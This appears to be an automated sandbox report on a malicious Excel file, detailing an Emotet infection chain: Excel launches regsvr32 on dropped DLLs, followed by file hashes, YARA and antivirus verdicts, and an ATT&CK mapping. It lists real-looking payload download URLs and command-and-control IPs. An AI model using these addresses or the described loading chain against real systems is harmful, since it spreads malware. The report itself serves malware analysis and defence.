            Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
            Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_d6ac1ea4 reference_sample = 2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71, os = windows, severity = x86, creation_date = 2022-05-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2, id = d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3, last_modified = 2022-06-09
            Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
            Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Emotet_d6ac1ea4 reference_sample = 2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71, os = windows, severity = x86, creation_date = 2022-05-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2, id = d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3, last_modified = 2022-06-09
            Source: C:\Users\user\Desktop\documentazione 68668.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
            Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\LxvynAbdjmnUIIL\Jump to behavior
            Source: 242.tmp.0.dr; OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: documentazione 68668.xls; Macro extractor: Sheet name: PKEKPPGEKKPGE
            Source: wdusx2.ocx.0.dr; Static PE information: Number of sections : 12 > 10
            Source: UVvnppK[1].dll.0.dr; Static PE information: Number of sections : 12 > 10
            Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll 1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
            Source: Joe Sandbox View; Dropped File: C:\Users\user\wdusx2.ocx 1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
            Source: Joe Sandbox View; Dropped File: C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy) 1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
            Source: documentazione 68668.xls; Virustotal: Detection: 55%
            Source: documentazione 68668.xls; Metadefender: Detection: 37%
            Source: documentazione 68668.xls; ReversingLabs: Detection: 73%
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx
            Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx
            Source: C:\Windows\System32\regsvr32.exe; Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx
            Source: C:\Windows\System32\regsvr32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\wdusx2.ocx
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVR5E64.tmp
            Source: classification engine; Classification label: mal100.troj.expl.evad.winXLS@10/13@3/45
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
            Source: documentazione 68668.xls; OLE indicator, Workbook stream: true
            Source: documentazione 68668.xls.0.dr; OLE indicator, Workbook stream: true
            Source: C:\Windows\System32\regsvr32.exe; Code function: 6_2_0000000180020760 Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle
            Source: C:\Windows\System32\regsvr32.exe; File read: C:\Windows\System32\drivers\etc\hosts
            Source: Window Recorder; Window detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: documentazione 68668.xls; Initial sample: OLE indicators vbamacros = False
            Source: UVvnppK[1].dll.0.dr; Static PE information: section name: .xdata
            Source: wdusx2.ocx.0.dr; Static PE information: section name: .xdata
            Source: wdusx2.ocx.0.dr; Static PE information: real checksum: 0xab9d6 should be: 0xad231
            Source: UVvnppK[1].dll.0.dr; Static PE information: real checksum: 0xab9d6 should be: 0xad231
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll
            Source: C:\Windows\System32\regsvr32.exe; File created: C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy)

            Boot Survival

            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\wdusx2.ocx

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\regsvr32.exe; File opened: C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll:Zone.Identifier read attributes | delete
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\regsvr32.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\regsvr32.exe TID: 2188; Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\System32\regsvr32.exe TID: 2924; Thread sleep time: -120000s >= -30000s
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll
            Source: C:\Windows\System32\regsvr32.exe; Process information queried: ProcessInformation
            Source: C:\Windows\System32\regsvr32.exe; Code function: 7_2_000000018000C3D8 FindNextFileW,FindFirstFileW
            Source: C:\Windows\System32\regsvr32.exe; File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\regsvr32.exe; Code function: 6_2_61A020C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort
            Source: C:\Windows\System32\regsvr32.exe; Code function: 6_2_61A0A268 SetUnhandledExceptionFilter,Sleep

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\regsvr32.exe; Network Connect: 165.22.254.68 443
            Source: C:\Windows\System32\regsvr32.exe; Network Connect: 198.199.70.22 8080
            Source: C:\Windows\System32\regsvr32.exe; Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll"
            Source: C:\Windows\System32\regsvr32.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\regsvr32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\System32\regsvr32.exe; Code function: 6_2_61A01FF0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter

            Stealing of Sensitive Information

            Source: Yara match; File source: 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 6.2.regsvr32.exe.4b0000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 6.2.regsvr32.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 7.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: Scripting [2]; Exploitation for Client Execution [43]; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
            Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
            Privilege Escalation: Process Injection [111]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
            Defense Evasion: Masquerading [131]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [1]; Process Injection [111]; Scripting [2]; Hidden Files and Directories [1]; Regsvr32 [1]
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: System Time Discovery [1]; Security Software Discovery [1]; Virtualization/Sandbox Evasion [1]; Process Discovery [2]; Remote System Discovery [1]; File and Directory Discovery [2]; System Information Discovery [15]
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Command and Control: Encrypted Channel [11]; Non-Standard Port [1]; Ingress Tool Transfer [15]; Non-Application Layer Protocol [3]; Application Layer Protocol [124]; Multiband Communication; Commonly Used Port
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact
            [Behavior graph (image not reproduced): Behavior Graph ID: 679676; Sample: documentazione 68668.xls; Startdate: 06/08/2022; Architecture: WINDOWS; Score: 100]

            Source | Detection | Scanner | Label
            documentazione 68668.xls | 55% | Virustotal | -
            documentazione 68668.xls | 37% | Metadefender | -
            documentazione 68668.xls | 73% | ReversingLabs | Document-Excel.Trojan.Abracadabra
            documentazione 68668.xls | 100% | Avira | XF/Agent.B2

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll | 100% | Avira | TR/Crypt.Agent.hwpwp
            C:\Users\user\wdusx2.ocx | 100% | Avira | TR/Crypt.Agent.hwpwp
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll | 40% | Metadefender | -
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll | 88% | ReversingLabs | Win64.Trojan.Emotet
            C:\Users\user\wdusx2.ocx | 40% | Metadefender | -
            C:\Users\user\wdusx2.ocx | 88% | ReversingLabs | Win64.Trojan.Emotet
            C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy) | 40% | Metadefender | -
            C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy) | 88% | ReversingLabs | Win64.Trojan.Emotet

            Source | Detection | Scanner | Label
            7.2.regsvr32.exe.140000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
            6.2.regsvr32.exe.4b0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461

            Source | Detection | Scanner | Label
            zardamarine.com | 11% | Virustotal | -

            Source | Detection | Scanner | Label
            http://kronostr.com/tr/68yHRhfuU7Qj/ | 100% | Avira URL Cloud | malware
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
            https://www.zardamarine.com/images/psQbAjrrEOXWPrS/ | 100% | Avira URL Cloud | malware
            http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/ | 100% | Avira URL Cloud | malware
            http://ocsp.entrust.net03 | 0% | URL Reputation | safe
            https://198.199.70.22/B | 100% | Avira URL Cloud | malware
            https://165.22.254.68/O | 100% | Avira URL Cloud | malware
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
            http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
            http://ocsp.entrust.net0D | 0% | URL Reputation | safe
            https://165.22.254.68/ | 0% | URL Reputation | safe
            https://198.199.70.22/080/F | 100% | Avira URL Cloud | malware
            https://198.199.70.22:8080/e | 100% | Avira URL Cloud | malware
            https://198.199.70.22:8080/a | 100% | Avira URL Cloud | malware
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            zardamarine.com | 208.67.23.91 | true | true | - | unknown
            labfitouts.com | 66.96.149.19 | true | false | - | unknown
            kronostr.com | 188.132.217.108 | true | false | - | unknown
            www.zardamarine.com | unknown | unknown | true | - | unknown

            Name | Malicious | Antivirus Detection | Reputation
            http://kronostr.com/tr/68yHRhfuU7Qj/ | true | Avira URL Cloud: malware | unknown
            https://www.zardamarine.com/images/psQbAjrrEOXWPrS/ | true | Avira URL Cloud: malware | unknown
            http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/ | true | Avira URL Cloud: malware | unknown
                        Joe Sandbox Version:35.0.0 Citrine
                        Analysis ID:679676
                        Start date and time: 2022-08-06 09:19:17 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 6m 24s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:documentazione 68668.xls
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winXLS@10/13@3/45
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 17.1% (good quality ratio 13.6%)
                        • Quality average: 69.8%
                        • Quality standard deviation: 40.4%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 18
                        • Number of non-executed functions: 128
                        Cookbook Comments:
                        • Found application associated with file extension: .xls
                        • Adjust boot time
                        • Enable AMSI
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • Excluded IPs from analysis (whitelisted): 209.197.3.8, 93.184.221.240
                        • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        Time | Type | Description
                        09:19:26 | API Interceptor | 532x Sleep call for process: regsvr32.exe modified
                        09:19:26 | API Interceptor | 212x Sleep call for process: svchost.exe modified
                                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                                    File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):61712
                                                                                                                    Entropy (8bit):7.995044632446497
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                                                                    MD5:589C442FC7A0C70DCA927115A700D41E
                                                                                                                    SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                                                                    SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                                                                    SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):326
                                                                                                                    Entropy (8bit):3.135891594007862
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:kKxHe+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:NeNkPlE99SNxAhUeE1
                                                                                                                    MD5:7E3A227B994264795E9EAE1F3EFCE18C
                                                                                                                    SHA1:61D017570E793456ADDC368F8128C8BE6D3233E8
                                                                                                                    SHA-256:7329C78BA23EA793109E9211BDD5E7B9217B3064830B5E17B0BEBE3733B0FE7E
                                                                                                                    SHA-512:1F1C834F156D80641D15C5F3FD7D36FCB9D8926F3709228F6325EEFC4ADEE0458406BF8D09244B7727DA5C9150376F7CA6335E1C49C6F0509567283AF0A6953A
                                                                                                                    Malicious:false
                                                                                                                    Preview:p...... .........X......(....................................................... .........L.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.f.4.c.9.6.9.8.b.d.8.1.:.0."...
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):6424
                                                                                                                    Entropy (8bit):5.110994009346991
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:vGzZELraVLYVQyS2qiCquqHlmRxMsVoWQ2z1:KZELraVUVZfqquq0jaIz1
                                                                                                                    MD5:2826B1E7AF14A75FEE51D4E4534EEFF5
                                                                                                                    SHA1:C9EAB9B2B15CFFC0273B3F8D197007B025018838
                                                                                                                    SHA-256:8CC3FE518E10BFEDD841106B51A5B0FBC337161CFC4D7360DB0436EE9D1A68E5
                                                                                                                    SHA-512:1C77D4A9EDE815B53DF07220742E43A180097F066BE9A6C3AC22F573910955DDB0047700F9F277BD6C794D8560865AD28CF58DE40BB1F939EA4C8CF7F28BA39E
                                                                                                                    Malicious:false
                                                                                                                    IE Cache URL:http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/
                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.. <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" /><meta name="robots" content="noindex, nofollow" /> <title>iPage</title> <link rel="stylesheet" type="text/css" href="http://www1.ipage.com/xslt/elements/generic_csscomponent.css" /> <script src="http://www1.ipage.com/generalAppC/scriptcat/87ae207201c55b84c5270851159260e1.1" type="text/javascript"></script></head><body id="stylesheet1"><style>#nav li {display: inline-block;}a.nav-thin-right {padding: 0 30px;}#nav li a.loginkey, #nav li a.loginkey:hover {background-position: -8px -8px;}</style> <div id="doc2" class="yui-t2"> <div id="hd" style="width: 950px;"> <div id="masthead" style="position: relative;"> <h1><a href="http://www.ipage.com/">iPage</a></h1> <h2>Powerful Web Hosting and Domain Names for Home and Business</h2><img src="http:
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):661504
                                                                                                                    Entropy (8bit):4.956080357124322
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HioEnJyVLryVLryVLryVLryVLryVLryVLGLO8yMZodxz51dPRHh+u392986Ugn:CAYYYYYY6a8S91d5Yu3w+6
                                                                                                                    MD5:3F418FE2743B42214FC4A6D6BDD15A13
                                                                                                                    SHA1:45A780014944CB01407EAB26D0E472C7E37D4963
                                                                                                                    SHA-256:1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
                                                                                                                    SHA-512:1CEE67179EBC7E000F1CA8AAF7BC88603A19A9A0352B1CE751DFFC3EE660211236BDF1F6C2E6BEED4503FC960E128D21230032E6EF0776058FCE26C195E1B00F
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Metadefender, Detection: 40%, Browse
                                                                                                                    • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                    Joe Sandbox View:
                                                                                                                    • Filename: DOC 18860.xls, Detection: malicious, Browse
                                                                                                                    • Filename: 9880-0806.xls, Detection: malicious, Browse
                                                                                                                    IE Cache URL:http://kronostr.com/tr/68yHRhfuU7Qj/
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...j8.b...........".....$.....................a............................................. .........................................E.......(............`..0...............................................(...................................................text...0#.......$.................. .P`.data........@.......(..............@.`..rdata.......P.......6..............@.`@.pdata..0....`.......:..............@.0@.xdata.......p.......>..............@.0@.bss..................................`..edata..E............B..............@.0@.idata..(............D..............@.0..CRT....X............L..............@.@..tls....H............N..............@.`..rsrc................P..............@.0..reloc..............................@.0B................................................................................................................................
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1536
                                                                                                                    Entropy (8bit):1.1464700112623651
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                                    File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):61712
                                                                                                                    Entropy (8bit):7.995044632446497
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                                                                    MD5:589C442FC7A0C70DCA927115A700D41E
                                                                                                                    SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                                                                    SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                                                                    SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                                    File Type:data
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):162298
                                                                                                                    Entropy (8bit):6.30209028339373
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:1ra6crtilgCyNY2IpFQNujcz5YJkKCC/rH8Zz04D8rlCMiB3XlMc6h:1x0imCy6QNujcmJkr97MiVGzh
                                                                                                                    MD5:7EE994C83F2744D702CBA18693ED1758
                                                                                                                    SHA1:17EAA8A28E7ABF096E97537EFE25A34CD7C1FD80
                                                                                                                    SHA-256:5DB917AB6DC8A42A43617850DFBE2C7F26A7F810B229B349E9DD2A2D615671D2
                                                                                                                    SHA-512:D5ED3AD13D58B6D41347D4521F71F9C5DCC3CA706AD1E3A96A9837C8E9087EB511896CA5B49904FC13E6FA176960F4B538379638FCF1D5E8DF6B30072F216BDA
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):28672
                                                                                                                    Entropy (8bit):3.2485849005107266
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:ADMPKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+Vyq:AYKpb8rGYrMPe3q7Q0XV5xtezE8vG8U7
                                                                                                                    MD5:27D3AABED2D8938973EB8824732687BA
                                                                                                                    SHA1:24D9540BDD0EF40C1A74148B1E940478BD01FD5A
                                                                                                                    SHA-256:9D0101BC81982ACA7CC528CC7AE03BAE8455F5CD7267B3A5D0EB87D68C7E63EA
                                                                                                                    SHA-512:D691693C1D0FEFB0FE19F06930F4120D3E80A9A8FE33D6CFA2F2183BA6AA368DF21806AD895815FFB8070BC2E175D0E8722AA9CC4AF1A0A5263EB4FCFDC72139
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):512
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3::
                                                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
